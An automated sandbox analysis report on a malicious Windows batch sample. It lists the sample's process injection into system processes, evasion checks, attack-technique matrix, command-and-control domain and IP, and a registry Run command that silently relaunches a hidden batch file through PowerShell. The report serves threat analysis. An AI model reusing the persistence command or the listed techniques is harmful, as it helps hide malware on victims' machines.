Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$rbx-1ktMxXBv VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$rbx-1ktMxXBv VolumeInformation
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,40_2_0000000140002300
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000001B444908090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,20_2_000001B444908090
Source: powershell.exe, 00000008.00000002.1694896454.00000201CD248000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2711777669.000001B795D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: dllhost.exeBinary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts141
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Native API
1
DLL Side-Loading
1
Access Token Manipulation
1
Obfuscated Files or Information
11
Input Capture
2
File and Directory Discovery
Remote Desktop Protocol1
Credential API Hooking
21
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts22
Command and Scripting Interpreter
11
Scheduled Task/Job
813
Process Injection
1
Software Packing
Security Account Manager143
System Information Discovery
SMB/Windows Admin Shares11
Input Capture
1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts11
Scheduled Task/Job
31
Registry Run Keys / Startup Folder
11
Scheduled Task/Job
1
DLL Side-Loading
NTDS491
Security Software Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts1
PowerShell
Network Logon Script31
Registry Run Keys / Startup Folder
1
File Deletion
LSA Secrets2
Process Discovery
SSHKeylogging13
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
Rootkit
Cached Domain Credentials261
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
Masquerading
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Modify Registry
Proc Filesystem1
System Network Configuration Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt261
Virtualization/Sandbox Evasion
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Access Token Manipulation
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd813
Process Injection
Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task2
Hidden Files and Directories
KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524984 Sample: 1 (2).cmd Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 81 azure-winsecure.com 2->81 83 ipwho.is 2->83 93 Suricata IDS alerts for network traffic 2->93 95 Malicious sample detected (through community Yara rule) 2->95 97 .NET source code references suspicious native API functions 2->97 99 14 other signatures 2->99 13 cmd.exe 1 2->13         started        16 powershell.exe 2->16         started        signatures3 process4 signatures5 129 Suspicious powershell command line found 13->129 131 Suspicious command line found 13->131 18 powershell.exe 33 13->18         started        22 WMIC.exe 1 13->22         started        24 WMIC.exe 1 13->24         started        30 4 other processes 13->30 133 Writes to foreign memory regions 16->133 135 Modifies the context of a thread in another process (thread injection) 16->135 137 Injects a PE file into a foreign processes 16->137 26 dllhost.exe 16->26         started        28 conhost.exe 16->28         started        process6 file7 79 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, DOS 18->79 dropped 101 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->101 103 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->103 105 Uses schtasks.exe or at.exe to add and modify task schedules 18->105 113 4 other signatures 18->113 32 cmd.exe 1 18->32         started        35 WerFault.exe 20 16 18->35         started        107 Injects code into the Windows Explorer (explorer.exe) 26->107 109 Contains functionality to inject code into remote processes 26->109 111 Writes to foreign memory regions 26->111 115 3 other signatures 26->115 37 winlogon.exe 26->37 injected 39 lsass.exe 26->39 injected 41 svchost.exe 26->41 injected 43 17 other processes 26->43 signatures8 process9 signatures10 89 Suspicious powershell command line found 32->89 45 powershell.exe 32->45         started        47 conhost.exe 32->47         started        49 cmd.exe 1 32->49         started        process11 process12 51 cmd.exe 1 45->51         started        signatures13 117 Suspicious powershell command line found 51->117 119 Suspicious command line found 51->119 54 powershell.exe 51->54         started        58 WMIC.exe 1 51->58         started        60 WMIC.exe 1 51->60         started        62 4 other processes 51->62 process14 dnsIp15 85 azure-winsecure.com 154.216.20.132, 63301, 6969 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 54->85 87 ipwho.is 195.201.57.90, 443, 63304 HETZNER-ASDE Germany 54->87 121 Creates autostart registry keys with suspicious values (likely registry only malware) 54->121 123 Creates autostart registry keys with suspicious names 54->123 125 Creates an autostart registry key pointing to binary in C:\Windows 54->125 127 6 other signatures 54->127 64 powershell.exe 54->64         started        67 schtasks.exe 54->67         started        69 WerFault.exe 54->69         started        71 WerFault.exe 54->71         started        signatures16 process17 signatures18 91 Injects a PE file into a foreign processes 64->91 73 conhost.exe 64->73         started        75 powershell.exe 64->75         started        77 conhost.exe 67->77         started        process19

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
1 (2).cmd0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://aka.ms/pscore6lB0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://aka.ms/pscore60%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    unknown
    ipwho.is
    195.201.57.90
    truefalse
      unknown
      azure-winsecure.com
      154.216.20.132
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://ipwho.is/false
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://aka.ms/pscore6xGApowershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmpfalse
            unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1940456822.00000201DF0CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2423655674.000001A39E520000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpfalse
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000026.00000002.2212213314.000001A38E53D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://aka.ms/pscore6lBpowershell.exe, 00000023.00000002.2175061332.0000000004E19000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2175061332.0000000004E28000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000026.00000002.2212213314.000001A38E53D000.00000004.00000800.00020000.00000000.sdmpfalse
                unknown
                https://go.micropowershell.exe, 00000026.00000002.2212213314.000001A38F45A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1940456822.00000201DF0CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://crl.microsoftApowershell.exe, 00000008.00000002.1695203762.00000201CD3A0000.00000004.00000001.00020000.00000000.sdmpfalse
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://aka.ms/pscore6powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://aka.ms/pscore68powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2212213314.000001A38E311000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2175061332.0000000004E03000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2212213314.000001A38E311000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000026.00000002.2212213314.000001A38E53D000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      154.216.20.132
                      azure-winsecure.comSeychelles
                      135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                      195.201.57.90
                      ipwho.isGermany
                      24940HETZNER-ASDEfalse
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1524984
                      Start date and time:2024-10-03 14:53:08 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 11m 27s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:43
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:18
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:1 (2).cmd
                      Detection:MAL
                      Classification:mal100.spyw.evad.winCMD@54/91@2/2
                      EGA Information:
                      • Successful, ratio: 63.6%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 72
                      • Number of non-executed functions: 271
                      Cookbook Comments:
                      • Found application associated with file extension: .cmd
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 104.208.16.94, 20.42.73.29, 93.184.221.240
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                      • Execution Graph export aborted for target conhost.exe, PID 5376 because there are no executed function
                      • Execution Graph export aborted for target dwm.exe, PID 984 because there are no executed function
                      • Execution Graph export aborted for target lsass.exe, PID 640 because there are no executed function
                      • Execution Graph export aborted for target powershell.exe, PID 7580 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtFsControlFile calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.
                      • VT rate limit hit for: 1 (2).cmd
                      TimeTypeDescription
                      08:54:04API Interceptor4x Sleep call for process: WMIC.exe modified
                      08:54:08API Interceptor123960x Sleep call for process: powershell.exe modified
                      08:54:19API Interceptor2x Sleep call for process: WerFault.exe modified
                      08:55:54API Interceptor192x Sleep call for process: winlogon.exe modified
                      08:55:55API Interceptor169x Sleep call for process: lsass.exe modified
                      08:55:56API Interceptor158x Sleep call for process: dwm.exe modified
                      08:55:56API Interceptor1122x Sleep call for process: svchost.exe modified
                      08:56:07API Interceptor9x Sleep call for process: cmd.exe modified
                      08:56:07API Interceptor10x Sleep call for process: conhost.exe modified
                      14:55:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                      14:55:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      154.216.20.132SC.cmdGet hashmaliciousUnknownBrowse
                        1.cmdGet hashmaliciousUnknownBrowse
                          2.cmdGet hashmaliciousUnknownBrowse
                            download_2.exeGet hashmaliciousQuasarBrowse
                              195.201.57.90SPt4FUjZMt.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, PythonCryptoHijacker, RedLineBrowse
                              • /?output=json
                              765iYbgWn9.exeGet hashmaliciousLuca StealerBrowse
                              • /?output=json
                              765iYbgWn9.exeGet hashmaliciousLuca StealerBrowse
                              • /?output=json
                              WfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                              • /?output=json
                              ubes6SC7Vd.exeGet hashmaliciousUnknownBrowse
                              • ipwhois.app/xml/
                              cOQD62FceM.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                              • /?output=json
                              Clipper.exeGet hashmaliciousUnknownBrowse
                              • /?output=json
                              cOQD62FceM.exeGet hashmaliciousLuca StealerBrowse
                              • /?output=json
                              Cryptor.exeGet hashmaliciousLuca StealerBrowse
                              • /?output=json
                              Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                              • /?output=json
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              azure-winsecure.comSC.cmdGet hashmaliciousUnknownBrowse
                              • 154.216.20.132
                              1.cmdGet hashmaliciousUnknownBrowse
                              • 154.216.20.132
                              2.cmdGet hashmaliciousUnknownBrowse
                              • 154.216.20.132
                              download_2.exeGet hashmaliciousQuasarBrowse
                              • 154.216.20.132
                              ipwho.isSC.cmdGet hashmaliciousUnknownBrowse
                              • 195.201.57.90
                              1.cmdGet hashmaliciousUnknownBrowse
                              • 108.181.98.179
                              2.cmdGet hashmaliciousUnknownBrowse
                              • 195.201.57.90
                              download_2.exeGet hashmaliciousQuasarBrowse
                              • 147.135.36.89
                              MZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                              • 195.201.57.90
                              N5mRSBWm8P.exeGet hashmaliciousQuasarBrowse
                              • 195.201.57.90
                              Pedido09669281099195.com.exeGet hashmaliciousDarkTortilla, QuasarBrowse
                              • 195.201.57.90
                              mtgjyX9gHF.exeGet hashmaliciousQuasarBrowse
                              • 108.181.98.179
                              SecuriteInfo.com.BackDoor.QuasarNET.3.14065.23993.exeGet hashmaliciousQuasarBrowse
                              • 195.201.57.90
                              http://ufvskbzrquea.pages.dev/Get hashmaliciousTechSupportScamBrowse
                              • 195.201.57.90
                              bg.microsoft.map.fastly.netSC.cmdGet hashmaliciousUnknownBrowse
                              • 199.232.210.172
                              Ton618.exeGet hashmaliciousQuasarBrowse
                              • 199.232.214.172
                              Ton618 (2).exeGet hashmaliciousQuasarBrowse
                              • 199.232.210.172
                              https://drmerp.com/bWFpbEBrc2xhdy5jby51aw==&xBvSo7gjDRPy&hmr&x-ad-vt-unk&OC305935Get hashmaliciousHTMLPhisherBrowse
                              • 199.232.214.172
                              2.cmdGet hashmaliciousUnknownBrowse
                              • 199.232.210.172
                              http://arcor.cfdGet hashmaliciousHTMLPhisherBrowse
                              • 199.232.210.172
                              veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                              • 199.232.210.172
                              http://investmentmemo.xyzGet hashmaliciousHtmlDropperBrowse
                              • 199.232.210.172
                              https://www.google.com.pe/url?q=Y7AzKRq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kI3xqbL8&sa=t&url=amp%2F%E2%80%8Bfc%C2%ADcid%E3%80%82io/www/%E2%80%8Brosan%C2%ADasidon%C2%ADiotri%C2%ADcologista%E2%80%8B.co%C2%ADm.%C2%ADbr/lo/lo//nJ5u8/Y21jX2FsbF9lbXBsb3llZXNfY29zdGFfcmljYUBjYXRhbGluYS5jb20=$Get hashmaliciousHtmlDropperBrowse
                              • 199.232.214.172
                              mnFHs2DuKg.exeGet hashmaliciousUnknownBrowse
                              • 199.232.210.172
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              HETZNER-ASDESC.cmdGet hashmaliciousUnknownBrowse
                              • 195.201.57.90
                              2.cmdGet hashmaliciousUnknownBrowse
                              • 195.201.57.90
                              file.exeGet hashmaliciousVidarBrowse
                              • 49.12.197.9
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                              • 49.12.197.9
                              gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                              • 116.203.0.21
                              dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                              • 116.203.0.21
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                              • 49.12.197.9
                              oRdgOQMxjr.exeGet hashmaliciousRedLineBrowse
                              • 178.63.51.126
                              https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                              • 136.243.216.232
                              file.exeGet hashmaliciousVidarBrowse
                              • 49.12.197.9
                              SKHT-ASShenzhenKatherineHengTechnologyInformationCoSC.cmdGet hashmaliciousUnknownBrowse
                              • 154.216.20.132
                              RICHIESTA_OFFERTA_RDO2400423.docx.docGet hashmaliciousGuLoaderBrowse
                              • 154.216.20.22
                              1.cmdGet hashmaliciousUnknownBrowse
                              • 154.216.20.132
                              2.cmdGet hashmaliciousUnknownBrowse
                              • 154.216.20.132
                              download_2.exeGet hashmaliciousQuasarBrowse
                              • 154.216.20.132
                              New order02102024.docGet hashmaliciousNanocoreBrowse
                              • 154.216.20.22
                              KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 154.216.20.22
                              https://akbb.kampanyakrediiislemleri.com/Get hashmaliciousUnknownBrowse
